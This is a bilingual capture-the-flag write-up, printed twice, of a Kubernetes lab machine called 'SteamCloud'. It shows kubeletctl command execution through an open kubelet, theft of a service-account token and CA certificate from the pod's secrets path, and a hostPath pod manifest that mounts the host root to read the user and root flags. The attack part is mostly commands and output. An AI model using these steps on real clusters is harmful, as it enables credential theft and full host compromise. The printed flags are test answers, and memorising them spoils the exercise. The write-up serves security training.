本篇文章介绍了如何在Kubernetes环境中进行信息收集、漏洞分析和特权升级。首先,扫描目标IP以获取开放端口信息,并确认目标是Kubernetes API。通过curl命令分析发现403错误,表明匿名用户没有访问权限。接着,使用kubeletctl列出Pods,发现其中有多个Pods,包括nginx。随后,通过执行命令获取token,验证身份,并创建新的Pod以挂载根目录,最终成功获取用户和根用户的flag。文章总结了在Kubernetes环境中进行渗透测试的关键步骤和学习经验。 This article describes how to perform information gathering, vulnerability analysis, and privilege escalation in a Kubernetes environment. First, scan the target IP to obtain open port information and confirm the target is the Kubernetes API. Analysis via curl command reveals a 403 error, indicating anonymous users lack access permissions. Next, use kubeletctl to list Pods, discovering multiple Pods including nginx. Subsequently, execute commands to obtain a token, verify identity, and create a new Pod to mount the root directory, ultimately successfully retrieving both the user and root flags. The article summarizes key steps and learning experiences from penetration testing in Kubernetes environments.
Information Gathering
{
"target": "10.10.11.133",
"scan_time": "2026-01-01 09:48:20",
"total_open_ports": 8,
"ports": [
{
"port": 22,
"service": "ssh",
"banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"
},
{
"port": 53,
"service": "domain",
"banner": null
},
{
"port": 2379,
"service": "Unknown",
"banner": null
},
{
"port": 2380,
"service": "Unknown",
"banner": null
},
{
"port": 8443,
"service": "Unknown",
"banner": null
},
{
"port": 10249,
"service": "Unknown",
"banner": null
},
{
"port": 10250,
"service": "Unknown",
"banner": null
},
{
"port": 10256,
"service": "Unknown",
"banner": null
}
]
}Vulnerability Analysis
➜ SteamCloud curl -k https://10.10.11.133:8443/
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {
},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {
},
"code": 403
}端口 8443 配合 kind, apiVersion 等字段,确认目标是 Kubernetes API。
Exploitation (User Flag)
查看其他的pods
➜ SteamCloud kubeletctl --server 10.10.11.133 pods
┌────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ storage-provisioner │ kube-system │ storage-provisioner │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ coredns-78fcd69978-glckl │ kube-system │ coredns │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ nginx │ default │ nginx │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ etcd-steamcloud │ kube-system │ etcd │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │
│ │ │ │ │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 scan rce
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Node with pods vulnerable to RCE │
├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ │ │ │ │ │ RUN │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.10.11.133 │ coredns-78fcd69978-glckl │ kube-system │ coredns │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 2 │ │ nginx │ default │ nginx │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 3 │ │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 4 │ │ etcd-steamcloud │ kube-system │ etcd │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 5 │ │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 6 │ │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 7 │ │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 8 │ │ storage-provisioner │ kube-system │ storage-provisioner │ - │
└───┴──────────────┴────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root) # 容器内的rootPrivilege Escalation (Root Flag)
拿token去8443主api验证
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzk4Nzk0NDgxLCJpYXQiOjE3NjcyNTg0ODEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjMwMzVlNTEzLTgzMDctNDk2YS05OTVhLWIyOWY0OTc1OWRlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjQ2ODZmNTc5LTFlNmItNDZhNy1iODg2LTgwN2M5YjZjZjM3NSJ9LCJ3YXJuYWZ0ZXIiOjE3NjcyNjIwODh9LCJuYmYiOjE3NjcyNTg0ODEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg%
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----➜ SteamCloud export token="eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzk4Nzk0NDgxLCJpYXQiOjE3NjcyNTg0ODEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjMwMzVlNTEzLTgzMDctNDk2YS05OTVhLWIyOWY0OTc1OWRlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjQ2ODZmNTc5LTFlNmItNDZhNy1iODg2LTgwN2M5YjZjZjM3NSJ9LCJ3YXJuYWZ0ZXIiOjE3NjcyNjIwODh9LCJuYmYiOjE3NjcyNTg0ODEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg"
➜ SteamCloud nano ca.crt
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 33m
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get create list]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]有创建pods权力,添加f.yaml将/目录挂载到/mnt/root
apiVersion: v1
kind: Pod
metadata:
name: nginxt
namespace: default
spec:
containers:
- name: nginxt
image: nginx:1.14.2
volumeMounts:
- mountPath: /mnt/root
name: mount-root-into-mnt
volumes:
- name: mount-root-into-mnt
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f f.yaml
pod/nginxt created
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 38m
nginxt 1/1 Running 0 54s➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/home/user/user.txt" -p nginxt -c nginxt
020d0e8176d3c7931b402d69b1320930
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/root/root.txt" -p nginxt -c nginxt
ce7eb1df436430aab7af0b7aa92e02ecLessons Learned
Information Gathering
{
"target": "10.10.11.133",
"scan_time": "2026-01-01 09:48:20",
"total_open_ports": 8,
"ports": [
{
"port": 22,
"service": "ssh",
"banner": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"
},
{
"port": 53,
"service": "domain",
"banner": null
},
{
"port": 2379,
"service": "Unknown",
"banner": null
},
{
"port": 2380,
"service": "Unknown",
"banner": null
},
{
"port": 8443,
"service": "Unknown",
"banner": null
},
{
"port": 10249,
"service": "Unknown",
"banner": null
},
{
"port": 10250,
"service": "Unknown",
"banner": null
},
{
"port": 10256,
"service": "Unknown",
"banner": null
}
]
}Vulnerability Analysis
➜ SteamCloud curl -k https://10.10.11.133:8443/
{
"kind": "Status",
"apiVersion": "v1",
"metadata": {
},
"status": "Failure",
"message": "forbidden: User \"system:anonymous\" cannot get path \"/\"",
"reason": "Forbidden",
"details": {
},
"code": 403
}Port 8443 combined with fields such as kind, apiVersion, etc., confirms that the target is Kubernetes API.
Exploitation (User Flag)
Check other pods
➜ SteamCloud kubeletctl --server 10.10.11.133 pods
┌────────────────────────────────────────────────────────────────────────────────┐
│ Pods from Kubelet │
├───┬────────────────────────────────────┬─────────────┬─────────────────────────┤
│ │ POD │ NAMESPACE │ CONTAINERS │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 1 │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 2 │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 3 │ storage-provisioner │ kube-system │ storage-provisioner │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 4 │ coredns-78fcd69978-glckl │ kube-system │ coredns │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 5 │ nginx │ default │ nginx │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 6 │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 7 │ etcd-steamcloud │ kube-system │ etcd │
│ │ │ │ │
├───┼────────────────────────────────────┼─────────────┼─────────────────────────┤
│ 8 │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │
│ │ │ │ │
└───┴────────────────────────────────────┴─────────────┴─────────────────────────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 scan rce
┌─────────────────────────────────────────────────────────────────────────────────────────────────────┐
│ Node with pods vulnerable to RCE │
├───┬──────────────┬────────────────────────────────────┬─────────────┬─────────────────────────┬─────┤
│ │ NODE IP │ PODS │ NAMESPACE │ CONTAINERS │ RCE │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ │ │ │ │ │ RUN │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 1 │ 10.10.11.133 │ coredns-78fcd69978-glckl │ kube-system │ coredns │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 2 │ │ nginx │ default │ nginx │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 3 │ │ kube-scheduler-steamcloud │ kube-system │ kube-scheduler │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 4 │ │ etcd-steamcloud │ kube-system │ etcd │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 5 │ │ kube-apiserver-steamcloud │ kube-system │ kube-apiserver │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 6 │ │ kube-controller-manager-steamcloud │ kube-system │ kube-controller-manager │ - │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 7 │ │ kube-proxy-hx9h5 │ kube-system │ kube-proxy │ + │
├───┼──────────────┼────────────────────────────────────┼─────────────┼─────────────────────────┼─────┤
│ 8 │ │ storage-provisioner │ kube-system │ storage-provisioner │ - │
└───┴──────────────┴────────────────────────────────────┴─────────────┴─────────────────────────┴─────┘
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root) # root inside the containerPrivilege Escalation (Root Flag)
Take the token to the main API on port 8443 for verification.
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx
eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzk4Nzk0NDgxLCJpYXQiOjE3NjcyNTg0ODEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjMwMzVlNTEzLTgzMDctNDk2YS05OTVhLWIyOWY0OTc1OWRlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjQ2ODZmNTc5LTFlNmItNDZhNy1iODg2LTgwN2M5YjZjZjM3NSJ9LCJ3YXJuYWZ0ZXIiOjE3NjcyNjIwODh9LCJuYmYiOjE3NjcyNTg0ODEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg%
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx
-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----➜ SteamCloud export token="eyJhbGciOiJSUzI1NiIsImtpZCI6IkdDNXJWZmVMWVlTUkllc0pQT3RFYmpqNGVTcTRaclg4eGlQRG9RSEFWVXMifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzk4Nzk0NDgxLCJpYXQiOjE3NjcyNTg0ODEsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjMwMzVlNTEzLTgzMDctNDk2YS05OTVhLWIyOWY0OTc1OWRlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjQ2ODZmNTc5LTFlNmItNDZhNy1iODg2LTgwN2M5YjZjZjM3NSJ9LCJ3YXJuYWZ0ZXIiOjE3NjcyNjIwODh9LCJuYmYiOjE3NjcyNTg0ODEsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.YiPdgWLqWwlkU7qZVd9lSMPVBLLASoESkFVgpg8TD1VCyoyBj6lm0Kr4s1JQY7yW1Uvz3XgRpmlAn7iTG3TuXvL4F3_eWSmBjH3PjF2g2ZXNU_uz87ad2KWh3HY63xupy3aRD3MbB77YsI5rslSZZqXZsE6AZShwuX68KBNlPahbhGTYDOt5eR7WUIaKWEIbYu87SH2WNUYfHN9G2WUPil-C1DY94b7uXgjsqfeHBJHxC5zBaqpG1bl7zXORgAHOGozo8E6K9n5BpNqwoWeaL6mBQbyaY7KNKIPnB8m2rXioFUt7JfUWztYTZrOPpKhfFEwV2yi0yK4K3oGE8p-rSg"
➜ SteamCloud nano ca.crt
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 33m
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
pods [] [] [get create list]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]Have permission to create pods. Add f.yaml to mount the / directory to /mnt/root.
apiVersion: v1
kind: Pod
metadata:
name: nginxt
namespace: default
spec:
containers:
- name: nginxt
image: nginx:1.14.2
volumeMounts:
- mountPath: /mnt/root
name: mount-root-into-mnt
volumes:
- name: mount-root-into-mnt
hostPath:
path: /
automountServiceAccountToken: true
hostNetwork: true➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f f.yaml
pod/nginxt created
➜ SteamCloud kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME READY STATUS RESTARTS AGE
nginx 1/1 Running 0 38m
nginxt 1/1 Running 0 54s➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/home/user/user.txt" -p nginxt -c nginxt
020d0e8176d3c7931b402d69b1320930
➜ SteamCloud kubeletctl --server 10.10.11.133 exec "cat /mnt/root/root/root.txt" -p nginxt -c nginxt
ce7eb1df436430aab7af0b7aa92e02ec